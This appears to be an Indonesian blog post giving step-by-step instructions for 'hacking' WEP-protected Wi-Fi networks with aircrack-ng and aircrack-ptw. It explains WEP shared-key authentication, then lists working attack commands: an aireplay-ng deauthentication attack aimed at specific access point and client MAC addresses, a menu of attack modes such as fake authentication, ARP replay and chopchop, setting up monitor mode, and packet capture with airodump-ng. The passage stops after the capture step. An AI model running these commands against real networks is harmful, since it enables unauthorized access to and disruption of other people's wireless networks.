langkah-langkah Hacking WEP dengan Aircrack

Wednesday, April 11, 2012 ·


Hacking WEP dengan Aircrack
WEP
Shared Key atau WEP (Wired Equivalent Privacy) adalah suatu metoda pengamanan
jaringan nirkabel, disebut juga dengan Shared Key Authentication. Shared Key
Authentication adalah metoda otentikasi yang membutuhkan penggunaan WEP.
Enkripsi WEP menggunakan kunci yang dimasukkan (oleh administrator) ke client
maupun access point. Kunci ini harus cocok dari yang diberikan akses point ke client,
dengan yang dimasukkan client untuk authentikasi menuju access point.
Proses Shared Key Authentication:

1. client meminta asosiasi ke access point, langkah ini sama seperti Open System
Authentication.
2. access point mengirimkan text challenge ke client secara transparan.
3. client akan memberikan respon dengan mengenkripsi text challenge dengan
menggunakan kunci WEP dan mengirimkan kembali ke access point.
4. access point memberi respon atas tanggapan client, akses point akan
melakukan decrypt terhadap respon enkripsi dari client untuk melakukan
verifikasi bahwa text challenge dienkripsi dengan menggunakan WEP key
yang sesuai. Pada proses ini, access point akan menentukan apakah client
sudah memberikan kunci WEP yang sesuai. Apabila kunci WEP yang
diberikan oleh client sudah benar, maka access point akan merespon positif
dan langsung meng-authentikasi client. Namun bila kunci WEP yang
dimasukkan client adalah salah, maka access point akan merespon negatif dan
client tidak akan diberi authentikasi. Dengan demikian, client tidak akan
terauthentikasi dan tidak terasosiasi.
Menggunakan Aircrack-ptw
Akses point mengirimkan paket yang dinamakan beacon frame sekitar 10 beacon
frame setiap detiknya.Setiap paket data yang dikirimkan mengandung :
1. Nama dari network/akses point (ESSID)
2. Enkripsi yang digunakan
3. Berapa Mbit rata-rata data yang di support
4. Channel yang sedang aktif
Data-data ini lah yang digunakan oleh aircrak-ptw untuk menembus proteksi dari
suatu akses point.
Aircrack-ptw adalah generasi terbaru setelah aircrack-ng, dimana aircrack-ptw
membutuhkan waktu yang lebih cepat untuk mendekripsi sebuah key dari suatu akses
point, tetapi aircrack-ptw ini masih memerlukan komponen-komponen dari aircrackng,
yaitu : airodump-ng untuk mengcapture paket dan aireplay-ng untuk melakukan
berbagai serangan jika perlu, misalnya untuk memaksa target untuk mengenerate
ARP request dan lain-lain.
Contoh serangan airepla-ng :
aireplay-ng --deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0
ath0
serangan ini untuk memaksa target untuk mengenerate ARP request.
Mode serangan yang lain adalah :
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--test : tests injection and quality (-9)
mode serangan bisa diganti dengan menggunakan kode angka.
Langkah-Langkah Menggunakan Aircrack-ptw
1. Configurasi wireless card
$ airmon-ng stop ath0
$ iwconfig
pastikan respon sistem sebagai berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor
mode enabled)
berikan command airmon-ng start wifi0 9, untuk
menjalankan wireless card pada channel tertentu
$ airmon-ng start wifi0 9
maka sistem harus merespon
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
(monitor mode enabled)
berikan command
$ ifconfig ath0 up
dan pastikan sistem harus merespon sebagai berikut :
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point:
00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2. Jalankan Airodump-ng
airodump-ng --channel X --write prefix_for_capture_file
interface
$ airodump-ng --channel 3 --write tes ath0
data hasil capture akan ditulis dalam file tes, oleh
airodump-ng akan disimpan dengan nama tes-01.cap

0 comments:

Archives